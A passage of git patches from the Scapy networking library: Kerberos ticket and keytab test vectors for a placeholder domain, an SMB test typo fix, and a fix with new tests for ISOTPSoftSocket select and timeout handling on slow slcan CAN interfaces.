pa_type=2 Start time End time Renew until Auth time 27/09/22 17:29:30 28/09/22 03:29:30 30/09/22 17:29:27 27/09/22 17:29:30 """.strip() @@ -1062,9 +1065,10 @@ assert RESULT == EXPECTED_CCACHE_DATA = Ticketer++ - Import ticket TKT = KRB_Ticket(bytes.fromhex("618204b3308204afa003020105a10e1b0c444f4d41494e2e4c4f43414ca221301fa003020102a11830161b066b72627467741b0c444f4d41494e2e4c4f43414ca38204733082046fa003020112a103020103a28204610482045dbd10c11e1def682dc3607c98db0806acf2809a1f8c73fda44f86c14bd039c4c95a41ed400ac4e558970c51316ffdf34bd695a636bcb1e5074419d083e918085ec56ff77af9f6a410faff3b9859a635184486c83521b5390ec724185057e3e62843a92d9ba500dd24d9ebeff0654fe459cf35d9607b11f7c35bf6ba4dd378fd5c99554650296abcc374c3ff2fcf807038848f351e9134f69726b5e92aec99e4aa99613c35609b0094b533811513e9ba48b9113f0f2b4dbcf9e05a6668c998c09f65ae48c8ea1b7fbc62b5cbbec7decc0a4832df93aec08c138a63621f8c584a8530a380b54b37fdb8dda6924e4260710cf8b66c71479dcb6916790c5c582b9953cab7085178e280d182a74f93fcd3bc83a0dc26284551a4d230a50a8b341de132fdf0f97bb7abdec48021e04c3deda89897c684d5603636bd66842ed4b2586f8e09fbb5e0228bcce3e5ffc82e5674f16a65a4f1b7b17b3854a5465734a5fec573c54526f27b9ea8a64646f01268b040d09f2acda82a37fb195cb24f8c1092919574999fd61d859aed2af5a9457a20a72e6188c0d813cb12713779f84f7bed298e2cd793b06e639d859b4fb3a5f746e2023bcf0627a8a87425899aa3a9b63f558965eccabc35330562b055426e2fc6808c456ee8f047d09a7021b6a4f2547cde6552224b294750efd492ea0745035f76a394d5b6e26442e5542b4d557722ee21b70c05567241ed97dffb31502d950c50462f478fccd8454ec38424688e87c4428c3763b369f1b51509ef36548dcf7a5c842475aa65bec10d6f86cecd90e4694f36d68052b55a2715c00e269c215071311482118ed0168fabb3053ad59dcdf42a42502685cdfcc679d2272dd12ab658ff8588b34cb48b3aef4a1961694ab2b31a812a683015ed343a8c21498997b0ded3767f73e069c9633845b582d6f1a987d6b09d31b330a3cbf2c430fb6f5d6fa27f83d9624b7bb8cebc248933b68dbe1b6b2822b96621159d9249ded893cbedcf1fc5ee77cb69695852170b24ea2f36aa898a24212b2edf84459a4381bd243797b9a3281d7e1b280f6add79dbb1cc5d887178d0813549a168a38be441bb387764098c4e7bed81f7973ee19e733767a4dd05212a18b12c838c674c18b0d6304a28be3de7928ffdd1449d297884c6a6a574b13a0d289425c1ebf37c5af56d04753fcc0c02fdcc98427fb9aa33510905ba2b6746a8b59742e4243f6fba814585b122794a54aecba3ea956a0c85fded2582cb4809ee7be471253f0256503636e81f35df38b177c3c071677e1dd9efa6b10c6a122ab0522f2b10e8b625355f5c1e7996c7055237182691ede31a5e602966f90c2a66bdf997872dbdc97155d723bc1fb187bd0f42cbcdedbe2c5717d13e27e2134ac6cd9d3a53cd215344a8278065da4eea7544860eda5fdb41f849ff7c1db775f7a0a62d2875b43b55bc091e8056666507dfcaded40a83211db7a5856d4c9b5e2ef862830cef8a4c36ce034e9a9e11f558f008cdbe4152081c30dae53b6de44e1703236490cfc87be9e96fa0679f87255069994a262d61d57be0382fe9e570")) +TKT_SKEY = bytes.fromhex("dd4e16dbcfe19d82cb6fc9b593bb7449c1d8a46687dc20c295ed0e51cc4c3d0d") t = Ticketer() -t.import_krb(TKT, hash=bytes.fromhex("dd4e16dbcfe19d82cb6fc9b593bb7449c1d8a46687dc20c295ed0e51cc4c3d0d")) +t.import_krb(TKT, hash=TKT_SKEY) tkt, _, upn, spn = t.export_krb(0) hexdiff(tkt, TKT) @@ -1075,13 +1079,13 @@ assert spn == 'krbtgt/DOMAIN.LOCAL@DOMAIN.LOCAL' = Ticketer++ - Create keytab t = Ticketer() -t.add_cred("host/dc.domain.local", password="Scapy1", salt=b"salt") +t.add_cred("host/dc.domain.local@domain.local", password="Scapy1", salt=b"salt") -assert t.get_cred("host/dc.domain.local").key == bytes.fromhex("811f44006ad73972ffec42cc89ce6e79749e6effd8db4db5fb0f38c0f3fa6f4f") +assert t.get_cred("host/dc.domain.local@domain.local").key == bytes.fromhex("811f44006ad73972ffec42cc89ce6e79749e6effd8db4db5fb0f38c0f3fa6f4f") = Ticketer++ - Get SPN ssp -ssp = t.ssp("host/dc.domain.local") +ssp = t.ssp("host/dc.domain.local@domain.local") = Ticketer++ - Load keytab @@ -1130,6 +1134,48 @@ TICKETER_TEMPFILE = get_temp_file() t.save_keytab(TICKETER_TEMPFILE) + += Ticketer++ - Real example - Import ASREP + +t = Ticketer() + +asrep = KerberosClient.RES_AS_MODE( + asrep=KRB_AS_REP(bytes.fromhex('6b82083c30820838a003020105a10302010ba2820174308201703082016ca10402020088a28201620482015ea082015a30820156a08201523082014ea003020112a2820145048201414722f301958ad09a272342ec03ec5f04b76de456b73ab2684d49a2ba9ddd900199e0cee8dff6bcc573d30def6aeec4c39385b7ecea55b4d096a8fe5fecac0cf8122f710bb4b69953ecc35954a4e5f7ac84d73f17b290aac1e6cad32a58fb6db7d0ff1d816e40c34375f18d69af15a243b6652e4630b4b80f4c94f5b8ae7aecb199ca3d25c69600df88b6e7624feb3345e872543d537b403073e8dcb80310e8ca45fed3d7f53db440b4b7d55299721dfe620a2e55dbf5abc8c9219854df02700af0b1e7117a62d402b10ec336df6de09fb594ebf96a5957849dbdb7add039c6f5e9ed10cfd93b621b33b5f3c27c7d84f731f3a8e10b1ed39bcd04cdfba41452e85b0a5650b0011486f3137057ad7c09d56f3509a7efd6bc66c49e9a30b3a63c26b24b0575e06cd1be22c99df6baf3413d5da09e7d41cee2c9dc4b0014623dd7014ba30e1b0c444f4d41494e2e4c4f43414ca41a3018a003020101a111300f1b0d41646d696e6973747261746f72a58205106182050c30820508a003020105a10e1b0c444f4d41494e2e4c4f43414ca221301fa003020102a11830161b066b72627467741b0c444f4d41494e2e4c4f43414ca38204cc308204c8a003020112a103020102a28204ba048204b6156ec9c868912ff7af63ced40bc8492a7a505250a0a93f2ba924f4634cf488dc6212994fdb4a95bc94169f3872c50a628f3ff25975c8e575b3c179364a62e3a6b38b514960eb9f04ecded7c173cf9aeb4ebe3b39e9c80c8acdd41ed26caae83881666a4304b42a37de4bb6bd40859fc9cffd5fb5821809da0319aa0b2a35b98a0a77df53a9b3d47ecaacc8acdf404ac7b16247dd94e15122b709d4a44da741f32fe05e6a77b74e6b63993b85aa004cd38714ed48399f75a5f0c140a8555b6cc043b3226cd58f74eb70921220a0e906b5a8292e589d38685e6782abc4d159822787e9f43194e11e27a514c62dbcd71f8349dd6d556814ea77687c46e2238bc061671d68ef1d3e3091a736ddad27eec84fc2b41b115c18b02f92828311950564661f3023c73d75a6b20aaa223bdeace648e815ab8ffaf943cadd4113f456960f8a903dceeea0f59826299c752287c1ecd188a4c83adbc3054ba4f4b91537710bc8c242d8820dd62a46c48a81619abb959f9eb8db5ba64ad5121ace5cee443dbcc7a25b8dd0fede9d77b1051a8c96a39c852402bd020052df0780eea63f4b6b8b2c7f63749602fcc92d123d5e2c1a85339d942bff57939967b99e159901b1efb05da164736329dc8fdce78a3bb1e0f449627870380bc4d28de38ab11bca95d6317fa64f33a7be46be25cd560425b0b1b1b7d0b6873fe44d2d41db26f2c2ddd6dc5b0f707f12fa60d1e65516c120dd2adc2ac9f7ad35986f34f050ccc08611a0641f62adafdd68e206730a8b484352bb99334796a0212b683a6fca76bf7fc57e264ecb5ff8d7ed76163f7554c112d6666b885eecc6c10257d7e481544c81df7f4f5878aab1936ecff57830335c1b37a20f32a63303be325e3fa54c1f7561663925230fe40f386f63457e98f5a5fe92b6241262fa9783c60d1195b3124ae3642c7c3c9f9bd6f4b1d5220e4fff22c6c2eb4f5cf4d08b5359e77b608f6a2962050a039280e98cecf5e5bb613b7e18ca557103b30ab4a31fcdda26a1fec01653569295351faa0c8dfafcc77bf745507031d10c3ddefdde29aee9f932e1126527f2b47209a83aa20bcfab1ca9a176f52eaaf08948deacf9981979c422a82fdc23473763ca6571b50702bb13d67c7fdddc4dbe320e47cc75f7c12fa3f7eb39bfde9995c2984ed8f4de09786d4745281a58f4750f9752ba3040c16ff8e4a0bcaf4216f4261df823e0cf7d1d8319cc546de50fbc53e78bed55feadcd86cd088d9c74b76c7db6768a1c3cad159d8f928a0c6f7d084f3ef2e1e77dd3ebbc32149ac582fb443deeb865e781eee59bb8241239369b229d53d6dce6b40a4722504097cfc73f93ed3bb7d6a52e2f47a7bd3e330268122fc02d21d400f1f1292c32cdd0f0d748ff5941a98eb048e7e645141b09c55fb266c086b1765ec90032443c5f99fc8fff9d2e9561f1b70f30369d4e818a879f6eacb357c44d1411008b7706b4adf02a5b5471069f2b2f5fe3c292a7e2d00d8570b1755b6349582eeafc45be4b352d10bb8e2914016489fa6d427d8bd45abd67bc88612ce6a45a46a5aede05743b79196f84fc37455968f8b1095ec48897f671f375d1d1e5296aa7831d4148a270ef6496bfa98dccfbddeef5f9166d83bbd1caf5e7d93f981e70e3df067437f6fe1925a26c9b078e76aebc05b50ac613ebba3012d57d711d8dc60e7ceba68201723082016ea003020112a103020101a28201600482015c3c1e391355e9dbd061b723b597afd5a10aff251e65b58295729849c5160e11987ae9aec03c1aa5d9c26906479cabab031740eea870f7bb5423f1936f0ed2aed1fa6dfcd9d6ba373220c65635b2d52c00fe5f73c8ed5a3857e135d6eb10a8ffd47653abb60b8b93d7947e4b5d2cff7fa1374958b928affba651a5f6b34dcab3c3297919c181fc2807e8cb353fb8a6ebeacd2020cdd327ab3e53045f242c493f88aecf82ff05051789baa551a93d2aaf9fc1596a33ea1f8d54b557f74747918c2f970040e2ed9cbdf52c172e0a87e5e795ce6c80705cc2bfaa156b5998e481b2e57e7ff0d1501ff5aa3a7cbad586ca0250181d7fd2d0f7b755b5bf202d1bff510dacccea27bc6f608a91919e3a4dfa5d2f621b0721f8e44d3741336603654eab1e2dcabbe8517545542944646b5867153d7ba7212de28ddb6be1e1166acaee7715df82273ff6ea62f33337a7f4250a3d0812fa5b57c7164a2ec651e15a')), + sessionkey=Key(EncryptionType.AES256_CTS_HMAC_SHA1_96, bytes.fromhex('1051fc76a7a5bf42d2a35dae808c74cbd7c5d7c3bca8dba775db8426058ecb62')), + kdcrep=EncASRepPart(bytes.fromhex('7982013c30820138a02b3029a003020112a12204201051fc76a7a5bf42d2a35dae808c74cbd7c5d7c3bca8dba775db8426058ecb62a11c301a3018a003020100a111180f32303236303232353232333731315aa20602043328586ba311180f32313030303931343032343830355aa40703050040e10000a511180f32303236303232353232333731315aa611180f32303236303232353232333731315aa711180f32303236303232363038333731315aa811180f32303236303232363038333731325aa90e1b0c444f4d41494e2e4c4f43414caa21301fa003020102a11830161b066b72627467741b0c444f4d41494e2e4c4f43414cab1d301b3019a003020114a112041057494e31302020202020202020202020ac2930273015a104020200a7a20d040b3009a00703050080000000300ea104020200a5a206040400000500')), + upn='Administrator@DOMAIN.LOCAL', + pa_type=138, +) +t.import_krb(asrep) + += Ticketer++ - Real example - Check X-CACHECONF + +xcacheconfs = t.get_krb_xcacheopts(0) + +assert len(xcacheconfs) == 2 +assert all(x.client.toPN() == 'Administrator@DOMAIN.LOCAL' for x in xcacheconfs) +assert all(x.server.components[0].data == b"krb5_ccache_conf_data" for x in xcacheconfs) +assert all(x.server.components[2].data == b'krbtgt/DOMAIN.LOCAL@DOMAIN.LOCAL' for x in xcacheconfs) +assert xcacheconfs[0].server.components[1].data == b"pa_type" +assert xcacheconfs[1].server.components[1].data == b"fast_avail" +assert xcacheconfs[0].ticket.data == b'138' +assert xcacheconfs[1].ticket.data == b'yes' + += Ticketer++ - Real example - Check primary_principal + +assert t.ccache.primary_principal.toPN() == 'Administrator@DOMAIN.LOCAL' +assert t.ccache.primary_principal.name_type == 1 + += Ticketer++ - Real example - Check iter_tickets + +assert len(list(t.iter_tickets())) == 1 +assert len(t.ccache.credentials) == 3 + += Ticketer++ - Real example - Test remove_krb + +t.remove_krb(0) +assert len(t.ccache.credentials) == 0 + + Crypto tests = RFC3691 - Test vectors for KRB-FX-CF2 diff --git a/test/scapy/layers/smb.uts b/test/scapy/layers/smb.uts index 1b90f1c348d..7142658b17d 100644 --- a/test/scapy/layers/smb.uts +++ b/test/scapy/layers/smb.uts @@ -32,11 +32,11 @@ assert TCP in pkt assert NBTSession in pkt assert pkt[NBTSession].LENGTH == 47 assert _SMBGeneric in pkt -# Should not have a proper SMBNegociate header as magic is \xf0SMB, not \xffSMB +# Should not have a proper SMBNegotiate header as magic is \xf0SMB, not \xffSMB assert SMB_Header not in pkt -= test SMB Negociate Header - assemble += test SMB Negotiate Header - assemble pkt = IP() / TCP() / NBTSession() / SMB_Header() / SMBNegotiate_Request() pkt = IP(raw(pkt)) From b28640f80b558b2078ec7ea1e11740c85c82ecf1 Mon Sep 17 00:00:00 2001 From: Ben Gardiner Date: Sat, 28 Feb 2026 06:40:33 -0500 Subject: [PATCH 1604/1632] Fix slcan w IsoTPSoftSocket (#4938) * isotp: fix soft socket .select() drops ObjectPipe, causing sr1() to hang in threaded mode The select() method was filtering out ObjectPipe instances (like the sniffer's close_pipe) from its return value. This prevented the sniffer's stop mechanism from working correctly in threaded mode - when sniffer.stop() sent to close_pipe, the select() method would unblock but not return the close_pipe, so the sniffer loop couldn't detect the stop signal and had to rely on continue_sniff timing, causing hangs under load. The fix includes close_pipe (ObjectPipe) instances in the select return value, so the sniffer loop properly detects the stop signal via the 'if s is close_pipe: break' check. Added two new tests: - sr1 timeout with threaded=True (no response scenario) - sr1 timeout with threaded=True and background CAN traffic The new "ISOTPSoftSocket select returns control ObjectPipe" test directly verifies that ISOTPSoftSocket.select() passes through ready ObjectPipe instances (e.g. the sniffer's close_pipe). This test deterministically FAILS without the fix and PASSES with it. The integration tests (sr1 timeout with threaded=True) are kept for end-to-end coverage but the race window is too narrow on Linux with TestSocket to reliably trigger the bug. Co-authored-by: copilot-swe-agent[bot] <198982749+Copilot@users.noreply.github.com> Co-authored-by: Ben Gardiner * isotp: fix potential cause of intermittent test failures where soft socket is garbage collected * isotpsoft, test: try hard to cleanup background threads in tests * isotpsoft, test: sr1() soft socket tests incl MF resp, SF req on slow (slcan) interface introduce mulitple tests to confirm that all the combinations of filters, threading, slow/fast interfaces work with the isotpsoft socket in the particularly problematic case of a SF request yielding an MF respoonse. The new tests currently fail for slow (slcan) interfaces * isotpsoft: make TimeoutScheduler._task a daemon thread Make this timeout scheduler a daemon thread. This should fix the python 3.13 tox failures on windows. * python-can, mux: special case for slcan: drop bus filters * isotpsoft: schedule timeouts to work with slow (slcan) interfaces, make close and timeouts more robust * python-can, mux: limit time under locks, optimize data receive latency * isotpsoft: optimize for slow (slcan) interfaces: don't call select when the internal state will do --------- Co-authored-by: Copilot <198982749+Copilot@users.noreply.github.com> --- scapy/contrib/cansocket_python_can.py | 90 ++++- scapy/contrib/isotp/isotp_soft_socket.py | 93 +++++- test/contrib/isotp_soft_socket.uts | 402 ++++++++++++++++++++++- test/testsocket.py | 166 ++++++++++ 4 files changed, 720 insertions(+), 31 deletions(-) diff --git a/scapy/contrib/cansocket_python_can.py b/scapy/contrib/cansocket_python_can.py index baf4a6cbd74..340104a4abb 100644 --- a/scapy/contrib/cansocket_python_can.py +++ b/scapy/contrib/cansocket_python_can.py @@ -16,6 +16,7 @@ from functools import reduce from operator import add + from collections import deque from scapy.config import conf @@ -55,14 +56,33 @@ def __init__(self, bus, sockets): """ self.bus = bus self.sockets = sockets - - def mux(self): - # type: () -> None - """Multiplexer function. Tries to receive from its python-can bus - object. If a message is received, this message gets forwarded to - all receive queues of the SocketWrapper objects. + self.closing = False + + # Maximum time (seconds) to spend reading frames in one read_bus() + # call. On serial interfaces (slcan) the final bus.recv(timeout=0) + # when the buffer is empty blocks for the serial port's read timeout + # (typically 100ms in python-can's slcan driver). During that block + # the TimeoutScheduler thread cannot run any other callbacks. By + # capping total read time, we ensure the scheduler stays responsive + # even on slow serial interfaces with heavy background traffic. + READ_BUS_TIME_LIMIT = 0.020 # 20 ms + + def read_bus(self): + # type: () -> List[can_Message] + """Read available frames from the bus, up to READ_BUS_TIME_LIMIT. + + On slow serial interfaces (slcan), bus.recv(timeout=0) can + block for ~100ms when the serial buffer is empty (python-can's + slcan serial timeout). This method limits total time spent + reading so the TimeoutScheduler thread stays responsive. + + This method intentionally does NOT hold pool_mutex so that + concurrent send() calls are not blocked during the serial I/O. """ + if self.closing: + return [] msgs = [] + deadline = time.monotonic() + self.READ_BUS_TIME_LIMIT while True: try: msg = self.bus.recv(timeout=0) @@ -70,9 +90,17 @@ def mux(self): break else: msgs.append(msg) + if time.monotonic() >= deadline: + break except Exception as e: - warning("[MUX] python-can exception caught: %s" % e) - + if not self.closing: + warning("[MUX] python-can exception caught: %s" % e) + break + return msgs + + def distribute(self, msgs): + # type: (List[can_Message]) -> None + """Distribute received messages to all subscribed sockets.""" for sock in self.sockets: with sock.lock: for msg in msgs: @@ -132,9 +160,17 @@ def multiplex_rx_packets(self): # this object is singleton and all python-CAN sockets are using # the same instance and locking the same locks. return + # Snapshot pool entries under the lock, then read from each bus + # WITHOUT holding pool_mutex. On slow serial interfaces (slcan) + # bus.recv(timeout=0) can take ~2-3ms per frame; holding the + # mutex during those reads would block send() for the entire + # duration. with self.pool_mutex: - for t in self.pool.values(): - t.mux() + mappers = list(self.pool.values()) + for mapper in mappers: + msgs = mapper.read_bus() + if msgs: + mapper.distribute(msgs) self.last_call = time.monotonic() def register(self, socket, *args, **kwargs): @@ -161,13 +197,36 @@ def register(self, socket, *args, **kwargs): if k in self.pool: t = self.pool[k] t.sockets.append(socket) - filters = [s.filters for s in t.sockets - if s.filters is not None] - if filters: - t.bus.set_filters(reduce(add, filters)) + # Update bus-level filters to the union of all sockets' + # filters. For non-slcan interfaces (socketcan, kvaser, + # vector), this enables efficient hardware/kernel + # filtering. For slcan, the bus filters were already + # cleared on creation, so this is a no-op (all sockets + # on slcan share the unfiltered bus). + if not k.lower().startswith('slcan'): + filters = [s.filters for s in t.sockets + if s.filters is not None] + if filters: + t.bus.set_filters(reduce(add, filters)) socket.name = k else: bus = can_Bus(*args, **kwargs) + # Serial interfaces like slcan only do software + # filtering inside BusABC.recv(): the recv loop reads + # one frame, finds it doesn't match, and returns + # None -- silently consuming serial bandwidth without + # returning the frame to the mux. This starves the + # mux on busy buses. + # + # For slcan, clear the filters from the bus so that + # bus.recv() returns ALL frames. Per-socket filtering + # in distribute() via _matches_filters() handles + # delivery. Other interfaces (socketcan, kvaser, + # vector, candle) perform efficient hardware/kernel + # filtering and should keep their bus-level filters. + if kwargs.get('can_filters') and \ + k.lower().startswith('slcan'): + bus.set_filters(None) socket.name = k self.pool[k] = SocketMapper(bus, [socket]) @@ -188,6 +247,7 @@ def unregister(self, socket): t = self.pool[socket.name] t.sockets.remove(socket) if not t.sockets: + t.closing = True t.bus.shutdown() del self.pool[socket.name] except KeyError: @@ -322,6 +382,7 @@ def select(sockets, remain=conf.recv_poll_rate): :returns: an array of sockets that were selected and the function to be called next to get the packets (i.g. recv) """ + SocketsPool.multiplex_rx_packets() ready_sockets = \ [s for s in sockets if isinstance(s, PythonCANSocket) and len(s.can_iface.rx_queue)] @@ -333,7 +394,6 @@ def select(sockets, remain=conf.recv_poll_rate): # yield this thread to avoid starvation time.sleep(0) - SocketsPool.multiplex_rx_packets() return cast(List[SuperSocket], ready_sockets) def close(self): diff --git a/scapy/contrib/isotp/isotp_soft_socket.py b/scapy/contrib/isotp/isotp_soft_socket.py index 4182d445336..e6baa1dbbf7 100644 --- a/scapy/contrib/isotp/isotp_soft_socket.py +++ b/scapy/contrib/isotp/isotp_soft_socket.py @@ -166,7 +166,8 @@ def __init__(self, def close(self): # type: () -> None if not self.closed: - self.impl.close() + if hasattr(self, "impl"): + self.impl.close() self.closed = True def failure_analysis(self): @@ -202,8 +203,8 @@ def recv(self, x=0xffff, **kwargs): return msg @staticmethod - def select(sockets, remain=None): - # type: (List[SuperSocket], Optional[float]) -> List[SuperSocket] + def select(sockets, remain=None): # type: ignore[override] + # type: (List[Union[SuperSocket, ObjectPipe[Any]]], Optional[float]) -> List[Union[SuperSocket, ObjectPipe[Any]]] # noqa: E501 """This function is called during sendrecv() routine to wait for sockets to be ready to receive """ @@ -214,8 +215,12 @@ def select(sockets, remain=None): ready_pipes = select_objects(obj_pipes, remain) - return [x for x in sockets if isinstance(x, ISOTPSoftSocket) and - not x.closed and x.impl.rx_queue in ready_pipes] + result: List[Union[SuperSocket, ObjectPipe[Any]]] = [ + x for x in sockets if isinstance(x, ISOTPSoftSocket) and + not x.closed and x.impl.rx_queue in ready_pipes] + result += [x for x in sockets if isinstance(x, ObjectPipe) and + x in ready_pipes] + return result class TimeoutScheduler: @@ -251,6 +256,7 @@ def schedule(cls, timeout, callback): # Start the scheduling thread if it is not started already if cls._thread is None: t = Thread(target=cls._task, name="TimeoutScheduler._task") + t.daemon = True must_interrupt = False cls._thread = t cls._event.clear() @@ -550,6 +556,7 @@ def __init__(self, self.tx_handle = TimeoutScheduler.schedule( self.rx_tx_poll_rate, self._send) self.last_rx_call = 0.0 + self.rx_start_time = 0.0 def failure_analysis(self): # type: () -> None @@ -592,12 +599,26 @@ def _get_padding_size(pl_size): def can_recv(self): # type: () -> None self.last_rx_call = TimeoutScheduler._time() - if self.can_socket.select([self.can_socket], 0): - pkt = self.can_socket.recv() - if pkt: - self.on_can_recv(pkt) + try: + while self.can_socket.select([self.can_socket], 0): + pkt = self.can_socket.recv() + if pkt: + self.on_can_recv(pkt) + else: + break + except Exception: + if not self.closed: + log_isotp.warning("Error in can_recv: %s", + traceback.format_exc()) if not self.closed and not self.can_socket.closed: - if self.can_socket.select([self.can_socket], 0): + # Determine poll_time from ISOTP state only. + # Avoid calling select() here — on slow serial interfaces + # (slcan), each select() triggers a mux() call that reads + # N frames at ~2.5ms each, wasting time that could be spent + # processing frames already in the rx_queue. + if self.rx_state == ISOTP_WAIT_DATA or \ + self.tx_state == ISOTP_WAIT_FC or \ + self.tx_state == ISOTP_WAIT_FIRST_FC: poll_time = 0.0 else: poll_time = self.rx_tx_poll_rate @@ -643,13 +664,46 @@ def close(self): self.tx_handle.cancel() except Scapy_Exception: pass + if self.rx_timeout_handle is not None: + try: + self.rx_timeout_handle.cancel() + except Scapy_Exception: + pass + if self.tx_timeout_handle is not None: + try: + self.tx_timeout_handle.cancel() + except Scapy_Exception: + pass + try: + self.rx_queue.close() + except (OSError, EOFError): + pass + try: + self.tx_queue.close() + except (OSError, EOFError): + pass def _rx_timer_handler(self): # type: () -> None """Method called every time the rx_timer times out, due to the peer not sending a consecutive frame within the expected time window""" + if self.closed: + return + if self.rx_state == ISOTP_WAIT_DATA: + # On slow serial interfaces (slcan), the mux reads frames + # from an OS serial buffer that may contain hundreds of + # background CAN frames. Consecutive Frames from the ECU + # are queued behind this backlog and can take several + # seconds to reach the ISOTP state machine. Extend the + # timeout up to 10 × cf_timeout to give the mux enough + # time to drain the backlog. + total_wait = TimeoutScheduler._time() - self.rx_start_time + if total_wait < self.cf_timeout * 10: + self.rx_timeout_handle = TimeoutScheduler.schedule( + self.cf_timeout, self._rx_timer_handler) + return # we did not get new data frames in time. # reset rx state self.rx_state = ISOTP_IDLE @@ -662,6 +716,9 @@ def _tx_timer_handler(self): two situations: either a Flow Control frame was not received in time, or the Separation Time Min is expired and a new frame must be sent.""" + if self.closed: + return + if (self.tx_state == ISOTP_WAIT_FC or self.tx_state == ISOTP_WAIT_FIRST_FC): # we did not get any flow control frame in time @@ -866,6 +923,7 @@ def _recv_ff(self, data, ts): # initial setup for this pdu reception self.rx_sn = 1 self.rx_state = ISOTP_WAIT_DATA + self.rx_start_time = TimeoutScheduler._time() # no creation of flow control frames if not self.listen_only: @@ -994,11 +1052,16 @@ def begin_send(self, x): def _send(self): # type: () -> None - if self.tx_state == ISOTP_IDLE: - if select_objects([self.tx_queue], 0): - pkt = self.tx_queue.recv() - if pkt: - self.begin_send(pkt) + try: + if self.tx_state == ISOTP_IDLE: + if select_objects([self.tx_queue], 0): + pkt = self.tx_queue.recv() + if pkt: + self.begin_send(pkt) + except Exception: + if not self.closed: + log_isotp.warning("Error in _send: %s", + traceback.format_exc()) if not self.closed: self.tx_handle = TimeoutScheduler.schedule( diff --git a/test/contrib/isotp_soft_socket.uts b/test/contrib/isotp_soft_socket.uts index 2e7bdfaeccf..f112563d62a 100644 --- a/test/contrib/isotp_soft_socket.uts +++ b/test/contrib/isotp_soft_socket.uts @@ -10,7 +10,7 @@ from io import BytesIO from scapy.layers.can import * from scapy.contrib.isotp import * from scapy.contrib.isotp.isotp_soft_socket import TimeoutScheduler -from test.testsocket import TestSocket, cleanup_testsockets +from test.testsocket import TestSocket, SlowTestSocket, cleanup_testsockets with open(scapy_path("test/contrib/automotive/interface_mockup.py")) as f: exec(f.read()) @@ -954,6 +954,204 @@ with TestSocket(CAN) as isocan_tx, ISOTPSoftSocket(isocan_tx, 0x123, 0x321) as s assert rx2 is None += ISOTPSoftSocket select returns control ObjectPipe + +from scapy.automaton import ObjectPipe as _ObjectPipe + +close_pipe = _ObjectPipe("control_socket") +close_pipe.send(None) + +with TestSocket(CAN) as isocan, ISOTPSoftSocket(isocan, 0x123, 0x321) as sock: + result = ISOTPSoftSocket.select([sock, close_pipe], remain=0) + +assert close_pipe in result + +close_pipe.close() + += ISOTPSoftSocket select returns control ObjectPipe alongside ready rx_queue + +from scapy.automaton import ObjectPipe as _ObjectPipe + +close_pipe = _ObjectPipe("control_socket") +close_pipe.send(None) + +with TestSocket(CAN) as isocan, ISOTPSoftSocket(isocan, 0x641, 0x241) as sock: + sock.impl.rx_queue.send((b'\x62\xF1\x90\x41\x42\x43', 0.0)) + result = ISOTPSoftSocket.select([sock, close_pipe], remain=0) + +assert close_pipe in result +assert sock in result + +close_pipe.close() + += ISOTPSoftSocket sr1 SF request with MF response threaded + +from threading import Thread + +request = ISOTP(b'\x22\xF1\x90') +response_data = b'\x62\xF1\x90' + b'\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4A\x4B\x4C\x4D\x4E\x4F\x50' +response_msg = ISOTP(response_data) + +with TestSocket(CAN) as isocan_tx, ISOTPSoftSocket(isocan_tx, 0x641, 0x241) as sock_tx, \ + TestSocket(CAN) as isocan_rx, ISOTPSoftSocket(isocan_rx, 0x241, 0x641) as sock_rx: + isocan_rx.pair(isocan_tx) + def responder(): + sniffed = sock_rx.sniff(count=1, timeout=5) + if sniffed: + sock_rx.send(response_msg) + resp_thread = Thread(target=responder, daemon=True) + resp_thread.start() + time.sleep(0.1) + rx = sock_tx.sr1(request, timeout=5, verbose=False, threaded=True) + resp_thread.join(timeout=5) + assert not resp_thread.is_alive(), "resp_thread still alive" + # Stop TimeoutScheduler while sockets are still open to avoid + # callbacks crashing on closed sockets and writing to stderr. + _ts = TimeoutScheduler._thread + TimeoutScheduler.clear() + if _ts is not None: + _ts.join(timeout=5) + +assert rx is not None +assert rx.data == response_data + += ISOTPSoftSocket sr1 timeout with threaded=True + +from threading import Thread, Event +msg = ISOTP(b'\x11\x22\x33\x11\x22\x33\x11\x22\x33\x11\x22\x33') + +with TestSocket(CAN) as isocan_tx, ISOTPSoftSocket(isocan_tx, 0x123, 0x321) as sock_tx, \ + TestSocket(CAN) as isocan_rx, ISOTPSoftSocket(isocan_rx, 0x321, 0x123) as sock_rx: + isocan_rx.pair(isocan_tx) + start = time.time() + rx2 = sock_tx.sr1(msg, timeout=3, verbose=False, threaded=True) + elapsed = time.time() - start + # Stop TimeoutScheduler while sockets are still open. + _ts = TimeoutScheduler._thread + TimeoutScheduler.clear() + if _ts is not None: + _ts.join(timeout=5) + +assert rx2 is None +assert elapsed < 5 + += ISOTPSoftSocket sr1 timeout with threaded=True and background traffic + +from threading import Thread, Event +msg = ISOTP(b'\x11\x22\x33\x11\x22\x33\x11\x22\x33\x11\x22\x33') + +with TestSocket(CAN) as isocan_tx, ISOTPSoftSocket(isocan_tx, 0x123, 0x321) as sock_tx, \ + TestSocket(CAN) as isocan_rx, ISOTPSoftSocket(isocan_rx, 0x321, 0x123) as sock_rx: + isocan_rx.pair(isocan_tx) + stop_traffic = Event() + def bg_traffic(): + while not stop_traffic.is_set(): + try: + isocan_rx.send(CAN(identifier=0x456, data=dhex("01 02 03"))) + except Exception: + break + time.sleep(0.01) + traffic_thread = Thread(target=bg_traffic, daemon=True) + traffic_thread.start() + start = time.time() + rx2 = sock_tx.sr1(msg, timeout=3, verbose=False, threaded=True) + elapsed = time.time() - start + stop_traffic.set() + traffic_thread.join(timeout=5) + assert not traffic_thread.is_alive(), "traffic_thread still alive" + # Stop TimeoutScheduler while sockets are still open. + _ts = TimeoutScheduler._thread + TimeoutScheduler.clear() + if _ts is not None: + _ts.join(timeout=5) + +assert rx2 is None +assert elapsed < 5 + += ISOTPSoftSocket sr1 SF request with MF response threaded and background traffic on slow interface + +from threading import Thread, Event + +response_data = b'\x62\xF1\x90' + b'\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4A\x4B\x4C\x4D\x4E\x4F\x50' + +stim = TestSocket(CAN) +isocan = TestSocket(CAN) +stim.pair(isocan) + +bg_frame = CAN(identifier=0x456, data=dhex("01 02 03")) +ff_frame = CAN(identifier=0x241, data=dhex("10 13 62 F1 90 41 42 43")) +cf1_frame = CAN(identifier=0x241, data=dhex("21 44 45 46 47 48 49 4A")) +cf2_frame = CAN(identifier=0x241, data=dhex("22 4B 4C 4D 4E 4F 50 00")) + +bg_count = 2000 # Large number of frames to stress the ISOTPSoftSocket implementation + +for _ in range(100): + _ = stim.send(bg_frame) + +stim.send(ff_frame) + +for _ in range(bg_count): + _ 